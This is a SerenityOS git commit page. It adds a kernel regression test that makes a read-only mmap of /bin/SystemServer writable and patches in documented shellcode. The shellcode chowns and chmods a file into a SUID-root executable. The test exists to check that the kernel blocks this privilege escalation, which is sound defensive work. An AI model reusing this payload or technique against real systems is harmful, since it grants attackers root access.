diff options
| author | Brian Gianforcaro <bgianf@serenityos.org> | 2021-05-06 01:14:50 -0700 |
|---|---|---|
| committer | Andreas Kling <kling@serenityos.org> | 2021-05-06 17:54:28 +0200 |
| commit | fd0dbd1ebfbcbc29d46393061daa49dc7390caa7 (patch) | |
| tree | 278ea94a46900e47ff7dae46b1017cd31095971a /Tests/Kernel/mmap-write-into-running-programs-executable-file.cpp | |
| parent | 6e641fadfa61d4b890db52fb60cc3709352336b6 (diff) | |
| download | serenity-fd0dbd1ebfbcbc29d46393061daa49dc7390caa7.zip | |
Tests: Establish root Tests directory, move Userland/Tests there
With the goal of centralizing all tests in the system, this is a
first step to establish a Tests sub-tree. It will contain all of
the unit tests and test harnesses for the various components in the
system.
Diffstat (limited to 'Tests/Kernel/mmap-write-into-running-programs-executable-file.cpp')
| -rw-r--r-- | Tests/Kernel/mmap-write-into-running-programs-executable-file.cpp | 76 |
1 files changed, 76 insertions, 0 deletions
diff --git a/Tests/Kernel/mmap-write-into-running-programs-executable-file.cpp b/Tests/Kernel/mmap-write-into-running-programs-executable-file.cpp new file mode 100644 index 0000000000..757710b569 --- /dev/null +++ b/Tests/Kernel/mmap-write-into-running-programs-executable-file.cpp @@ -0,0 +1,76 @@ +/* + * Copyright (c) 2018-2020, the SerenityOS developers. + * + * SPDX-License-Identifier: BSD-2-Clause + */ + +#include <AK/Types.h> +#include <fcntl.h> +#include <stdio.h> +#include <string.h> +#include <sys/mman.h> +#include <unistd.h> + +int main() +{ + int fd = open("/bin/SystemServer", O_RDONLY); + if (fd < 0) { + perror("open"); + return 1; + } + u8* ptr = (u8*)mmap(nullptr, 16384, PROT_READ, MAP_FILE | MAP_SHARED, fd, 0); + if (ptr == MAP_FAILED) { + perror("mmap"); + return 1; + } + + if (mprotect(ptr, 16384, PROT_READ | PROT_WRITE) < 0) { + perror("mprotect"); + return 1; + } + + /* + * + * This payload replaces the start of sigchld_handler in the /bin/SystemServer file. + * It does two things: + * + * chown ("/home/anon/own", 0, 0); + * chmod ("/home/anon/own", 04755); + * + * In other words, it turns "/home/anon/own" into a SUID-root executable! :^) + * + */ + +#if 0 + [bits 32] + [org 0x0804b111] + jmp $+17 + path: + db "/home/anon/own", 0 + mov eax, 79 + mov edx, path + mov ecx, 0 + mov ebx, 0 + int 0x82 + mov eax, 67 + mov edx, path + mov ecx, 15 + mov ebx, 2541 + int 0x82 + ret +#endif + + const u8 payload[] = { + 0xeb, 0x0f, 0x2f, 0x68, 0x6f, 0x6d, 0x65, 0x2f, 0x61, 0x6e, 0x6f, + 0x6e, 0x2f, 0x6f, 0x77, 0x6e, 0x00, 0xb8, 0x4f, 0x00, 0x00, 0x00, + 0xba, 0x13, 0xb1, 0x04, 0x08, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xbb, + 0x00, 0x00, 0x00, 0x00, 0xcd, 0x82, 0xb8, 0x43, 0x00, 0x00, 0x00, + 0xba, 0x13, 0xb1, 0x04, 0x08, 0xb9, 0x0f, 0x00, 0x00, 0x00, 0xbb, + 0xed, 0x09, 0x00, 0x00, 0xcd, 0x82, 0xc3 + }; + + memcpy(&ptr[0x3111], payload, sizeof(payload)); + + printf("ok\n"); + return 0; +} |